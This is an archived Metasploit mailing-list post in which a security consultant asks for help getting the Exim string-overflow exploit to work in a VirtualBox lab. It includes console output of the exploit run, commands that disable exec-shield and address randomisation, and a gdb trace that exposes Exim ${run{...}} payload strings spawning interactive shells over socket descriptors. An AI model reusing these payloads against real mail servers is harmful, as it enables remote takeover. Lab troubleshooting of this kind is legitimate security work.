Metasploit mailing list archives
exim4_string_overflow
From: Paul Johnston <paul.johnston () pentest co uk>
Date: Thu, 03 Feb 2011 11:30:03 +0000
Hi,

I'm having real trouble setting up a demo environment to try the exim4_string_overflow exploit against. The target OS is Oracle Enterprise Linux 5.4, running on VirtualBox. I've tried both the bundled Exim RPM and version 4.69 compiled from source.

I've disabled exec-shield and address randomization:

    [root@localhost ~]# cat /proc/sys/kernel/exec-shield
    0
    [root@localhost ~]# cat /proc/sys/kernel/randomize_va_space
    0

When I run the exploit, the following happens (if I'm *NOT* tracking the process with gdb):

    msf exploit(exim4_string_format) > exploit
    [*] Started reverse double handler
    [*] Connecting to 192.168.3.4:25 ...
    [*] Server: 220 localhost ESMTP Exim 4.69 Wed, 02 Feb 2011 19:17:47 +0000
    [*] EHLO: 250-localhost Hello ZtTr2Wp2.com [192.168.3.2]
    [*] EHLO: 250-SIZE 52428800
    [*] EHLO: 250-PIPELINING
    [*] EHLO: 250 HELP
    [*] Determined our hostname is ZtTr2Wp2.com and IP address is 192.168.3.2
    [*] MAIL: 250 OK
    [*] RCPT: 250 Accepted
    [*] DATA: 354 Enter message, ending with "." on a line by itself
    [*] Constructing initial headers ...
    [*] Constructing HeaderX ...
    [*] Constructing body ...
    [*] Sending 50 megabytes of data...
    [*] Ending first message.
    [-] Exploit exception: end of file reached
    [*] Exploit completed, but no session was created.

If I do track with gdb, the flow is slightly different but the exploit still fails. gdb shows this:

    (gdb) c
    Continuing.

(metasploit continues to send the 50MB message)

    Error while mapping shared library sections:
    'exec /bin/sh -i <&7 >&0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i <&8 >&0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i <&9 >&0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i <&10 >&0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i <&11 >&0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i <&12 >&0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i <&3 >&0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i <&4 >&0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i <&5 >&0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i <&6 >&0 2>&0'}} ${run{/bin/sh -c 'exec /b: No such file or directory.
    (no debugging symbols found)

    Program received signal SIGABRT, Aborted.
    0x007d2402 in __kernel_vsyscall ()

Any ideas? I'm totally stuck!

Thanks,

Paul

--
Pentest - When a tick in the box is not enough
Paul Johnston - IT Security Consultant / Tiger SST
Pentest Limited - ISO 9001 (cert 16055) / ISO 27001 (cert 558982)
Office: +44 (0) 161 233 0100
Mobile: +44 (0) 7817 219 072
Email policy: http://www.pentest.co.uk/legal.shtml#emailpolicy
Registered Number: 4217114 England & Wales
Registered Office: 26a The Downs, Altrincham, Cheshire, WA14 2PU, UK

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework